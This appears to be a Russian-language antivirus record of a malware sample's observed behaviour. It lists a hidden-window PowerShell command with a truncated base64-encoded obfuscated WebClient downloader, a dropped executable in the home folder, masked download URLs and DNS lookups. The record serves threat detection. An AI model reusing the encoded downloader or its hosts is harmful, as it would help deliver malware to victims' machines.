Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- %HOMEPATH%\355.exe
- %HOMEPATH%\355.exe
- %HOMEPATH%\355.exe
- http://da####talleys.com/wp-includes/rK7SE/
- http://ne####mixnews.com/wp-admin/2QwjJ/
- http://fi###rbling.com/html/QErq/
- DNS ASK da####talleys.com
- DNS ASK pe####liotar.com
- DNS ASK pe###sports.com
- DNS ASK ne####mixnews.com
- DNS ASK fi###rbling.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...' (со скрытым окном)